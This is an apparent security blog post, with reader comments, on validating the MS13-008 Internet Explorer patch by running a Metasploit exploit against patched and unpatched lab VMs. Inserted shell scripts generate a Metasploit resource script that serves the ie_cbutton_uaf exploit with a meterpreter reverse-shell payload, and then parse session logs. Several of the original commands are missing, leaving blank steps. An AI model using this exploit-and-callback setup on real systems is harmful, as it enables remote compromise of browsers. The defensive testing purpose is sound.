Update
Including a link to Process Hacker, thanks to the readers for pointing out this oversight! http://processhacker.sourceforge.net/

Introduction
Earlier last week a reader wrote in and asked us whether the patch for MS13-008 [1] [2] had worked. A comprehensive patch validation can take a significant amount of time, but there are a couple of things you can do to get a quick sanity check. I use Metasploit [3] for patch sanity checks. With a virtual machine you can also take snapshots at the various stages of patching. In this case my system is VMware Fusion version 5.0.2 (900491) [4] running Metasploit. Instructions for installing Metasploit exist all over the Internet, so we will not reproduce them here. A good install guide for OS X Mountain Lion can be found here [5], though I skip the Java component.
My setup includes two lab copies of Windows XP (I have been meaning to update to Windows 7).

Using Google to Find Things
To run my quick sanity check, I first locate the exploit module in the Metasploit module database. There are a couple of ways to do this. I usually start with a quick Google search to find the Metasploit module page for MS13-008. Putting:
In my search bar yields what I’m looking for at the top of the results [6].
Note: You can take a look at this great presentation on some Google-fu [7], and there are many books on the subject.

Setting the Trap
Second is to get Metasploit running on an attacker machine and set up the exploit module for MS13-008. We do this by navigating to the page that shows us where the module lives in the Metasploit module database [6]. We find from the documentation that what we are looking for is located at:
So we run the command:
Looking at the exploit documentation we are going to stick with the basic usage and enter:
Then we enter the next command, setting it to our host-only IP:
And then enter:
From here you should see output like the image below:
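The "Setting the Trap" steps above, captured as a Metasploit resource script so they can be replayed against each VM. This is an added example, not code from the diary or from the Metasploit project: the module path is the one from reference [6], and SRVHOST/SRVPORT/URIPATH and LHOST/LPORT are the standard options of a Metasploit browser module and its reverse payload. The 192.168.56.x address, the ports, the URI path and the file names are assumptions for a host-only lab network; the RFC 1918 check exists because a mistyped SRVHOST or LHOST either binds nothing useful or points an exploit server at a real network instead of the lab segment.

```shell
#!/bin/sh
# Added example, not from the original diary or the Metasploit project:
# write a Metasploit resource script for the MS13-008 module so the
# "Setting the Trap" steps are repeatable. Module path from reference [6];
# option names are the usual browser-module/reverse-payload ones. The
# addresses, ports, URI path and file names are lab assumptions.
set -eu

MODULE="exploit/windows/browser/ie_cbutton_uaf"
PAYLOAD="windows/meterpreter/reverse_tcp"
SRVPORT=8080
LPORT=4444
URIPATH="/ms13-008"

# is_private_ipv4 ADDR: succeed only for a well-formed RFC 1918 address.
# Both the exploit server (SRVHOST) and the payload call-back (LHOST) are
# bound to this address, so it must be the host-only interface, not a
# real one.
is_private_ipv4() {
    case "$1" in
        ""|.*|*.|*..*|*[!0-9.]*) return 1 ;;   # empty, stray dots, non-digits
    esac
    set -- $(printf '%s' "$1" | tr . ' ')
    [ $# -eq 4 ] || return 1
    for o in "$@"; do [ "$o" -le 255 ] || return 1; done
    case "$1.$2" in
        10.*)                            return 0 ;;
        192.168)                         return 0 ;;
        172.1[6-9]|172.2[0-9]|172.3[01]) return 0 ;;
    esac
    return 1
}

# exploit_url HOST_ONLY_IP: the link to paste into each target's browser
exploit_url() { printf 'http://%s:%s%s\n' "$1" "$SRVPORT" "$URIPATH"; }

# write_rc HOST_ONLY_IP OUTFILE LOGFILE: emit the resource script. The
# spool line keeps a copy of the console output for later review.
write_rc() {
    ip="$1"; out="$2"; log="$3"
    is_private_ipv4 "$ip" || { echo "refusing non-lab address: $ip" >&2; return 1; }
    cat >"$out" <<EOF
# generated: MS13-008 validation against a host-only lab
spool $log
use $MODULE
set SRVHOST $ip
set SRVPORT $SRVPORT
set URIPATH $URIPATH
set PAYLOAD $PAYLOAD
set LHOST $ip
set LPORT $LPORT
exploit -j
EOF
    echo "wrote $out; targets should browse to $(exploit_url "$ip")"
}

# usage: sh make-rc.sh <host-only-ip> [outfile] [logfile]
if [ $# -ge 1 ]; then
    write_rc "$1" "${2:-ms13-008.rc}" "${3:-ms13-008.log}"
fi
```

Run it as `sh make-rc.sh 192.168.56.1`, then `msfconsole -q -r ms13-008.rc`; the `exploit -j` line backgrounds the listener so the console stays usable while you browse from each VM, and the `spool` line writes everything the console prints to the log file named on the command line.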
My setup is simple. I have two virtual machines ready to go, one fully patched and one unpatched. First we will look for a successful exploit against the unpatched machine, to validate that the Metasploit module and payload actually work in this lab. Second we will run the same exploit against the fully patched system and ensure that it fails.
Note: Take snapshots of your virtual machines. It is a royal pain when you forget to do this.
Springing the Trap
The first step on the target machine is to start Process Hacker (see the link in the Update above) so we can observe the exploit process start. This also lets us watch some of the behaviour as it occurs (because we like that stuff, right?).
At this point we know the unpatched virtual machine is exploited and MS13-008 is a working vector, as Process Hacker is showing the injection.
Checking the Patch
Now for the quick sanity check and patch validation. Run the same exploit against your fully patched target virtual machine; the exploit should fail. In my case the VM's local anti-virus caught the exploit, and the exploit also failed after the anti-virus was disabled. Copy and paste the exploit URL into the browser on the patch-validation target and watch the Metasploit output. In this case, though, we are going to monitor a bit more deeply first, as we don't want to trust only what we see in Process Hacker. So we fire up RegShot [8] and take the first snapshot, with C:\ set as the directory to scan. Note: this can take some time.
After this is complete we copy and paste the exploit URL into the target browser and check our results. Sure enough, Metasploit sends the malicious exploit page but never gets a connection back from the payload:
We then do a quick check with Process Hacker and look at the process list.
And finally we take a second RegShot snapshot, compare it with the first, and look for any changes to the operating system.
After reviewing the RegShot comparison we can say with some confidence that the patched system survived the attack. We then re-enable our patched and updated anti-virus suite and run the attack again to check our AV signatures. It also picked up the attack.
Keep in mind what this does and does not prove. A module that fails against the patched box while succeeding against the unpatched one shows that this particular vector is closed; it does not prove that every code path the bulletin covers is fixed, and an exploit can fail for reasons that have nothing to do with the patch (anti-virus, the module's target setting, or a browser build the module does not support). That is why the unpatched control machine matters: without a successful run against it, a failure against the patched machine tells you very little.
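The "Checking the Patch" read-out from the attacker side, as an added example that is not part of the diary or of Metasploit. It reads the console output spooled to a file and decides, per target address, whether a session came back (exploited), the page was served but nothing called back (survived), or the target never fetched the page at all (inconclusive, which says nothing about the patch). It goes a little beyond the post in that both VMs can hit the same listener and be judged from one log, and it treats the unpatched machine as the control: a "survived" verdict for the patched box only counts when the unpatched box was actually popped. The sample log lines are constructed to resemble Metasploit browser-module output (exact wording varies between versions, so the patterns are kept loose), and the 192.168.56.x addresses are lab assumptions: .1 is the attacker, .101 the unpatched VM, .102 the patched VM.

```shell
#!/bin/sh
# Added example, not from the original diary or the Metasploit project:
# read the spooled msfconsole output and decide what happened to each
# target VM. The sample log is constructed; the addresses are lab
# assumptions (.1 attacker, .101 unpatched, .102 patched).
set -eu

SAMPLE_LOG="${TMPDIR:-/tmp}/ms13-008-sample.log"
cat >"$SAMPLE_LOG" <<'EOF'
[*] Using URL: http://192.168.56.1:8080/ms13-008
[*] Server started.
[*] 192.168.56.101    ie_cbutton_uaf - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1044)
[*] 192.168.56.102    ie_cbutton_uaf - Sending exploit...
EOF

# ip_escape ADDR: escape the dots so the address is a literal in an ERE
ip_escape() { printf '%s' "$1" | sed 's/\./\\./g'; }

# classify_target LOGFILE CLIENT_IP prints one of:
#   exploited  - a session came back from CLIENT_IP, so it is vulnerable
#   survived   - the exploit page was served to CLIENT_IP, no session followed
#   no-request - CLIENT_IP never fetched the page (typo, proxy, wrong VM
#                network); this says nothing about the patch
# The address is anchored on both sides so 192.168.56.1 does not also
# match 192.168.56.101, and the session line is matched on its "-> client:"
# part so the attacker's own address is never counted as exploited.
classify_target() {
    esc=$(ip_escape "$2")
    if grep -Eq "session [0-9]+ opened .*-> $esc:" "$1"; then
        echo exploited
    elif grep -E "(^|[^0-9.])$esc([^0-9]|$)" "$1" | grep -q 'Sending'; then
        echo survived
    else
        echo no-request
    fi
}

# validate_pair LOGFILE UNPATCHED_IP PATCHED_IP
# exit 0 = PASS, 1 = FAIL (patched box still exploitable), 2 = INCONCLUSIVE
validate_pair() {
    log="$1"; unpatched="$2"; patched="$3"
    u=$(classify_target "$log" "$unpatched")
    p=$(classify_target "$log" "$patched")
    if [ "$u" != exploited ]; then
        echo "INCONCLUSIVE: control VM $unpatched was '$u'; the module was never shown to work here"
        return 2
    fi
    case "$p" in
        survived)  echo "PASS: $patched was served the exploit but returned no session"; return 0 ;;
        exploited) echo "FAIL: $patched still returns a session"; return 1 ;;
        *)         echo "INCONCLUSIVE: $patched never requested the page"; return 2 ;;
    esac
}

# Run against the constructed log: .101 is the control, .102 the patched box
validate_pair "$SAMPLE_LOG" 192.168.56.101 192.168.56.102
```

Point it at the real spool file from your own run (`validate_pair ms13-008.log <unpatched-ip> <patched-ip>`) after both VMs have browsed to the exploit URL. The three-way verdict is the useful part: "no-request" is the case where the browser never reached the listener, which looks exactly like a working patch if you only watch for the absence of a session.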
Conclusion
In the fast-paced, often interrupt-driven lives we lead, this method can act as a fast validation. Often, when a reader writes in and asks whether a patch took, this is the process I use if I am in a hurry.
[1] http://isc.sans.edu/diary/January+2013+Microsoft+Out+of+Cycle+Patch/14941
[2] http://technet.microsoft.com/en-us/security/bulletin/ms13-008
[3] http://www.metasploit.com/
[4] http://www.vmware.com/products/fusion/overview.html
[5] http://www.darkoperator.com/installing-metasploit-framewor/
[6] http://www.metasploit.com/modules/exploit/windows/browser/ie_cbutton_uaf
[7] http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf
[8] http://sourceforge.net/projects/regshot/

Richard Porter --- ISC Handler on Duty
Jan 22nd 2013
Aren't there easier ways of doing a comprehensive patch analysis on a box - Nessus w/ credentialed scan, Secunia PSI, FileHippo for 3rd party apps, MS Baseline Analyser, etc.?
Dean, Jan 22nd 2013
dsh - SSHHH. Quiet. If there is a SANS post on patch validation using Metasploit, it is an *obvious* validation that using Metasploit is just fine in the enterprise. That way the IA peeps can keep their sploit skilz sharp for CTF and perhaps that sweet pentest gig they saw online, all while doing their day job. Don't you get it?
Anonymous, Jan 23rd 2013
Guys, re-read the first sentence. The question was how can you tell if the patch actually worked to fix the exploit, not how to tell whether or not the patch was installed.
bkendall, Jan 23rd 2013
The first use of [8] is for Process Hacker but that's not the link at the bottom. It is also on sourceforge. An interesting tool to find out about.
dave, Jan 23rd 2013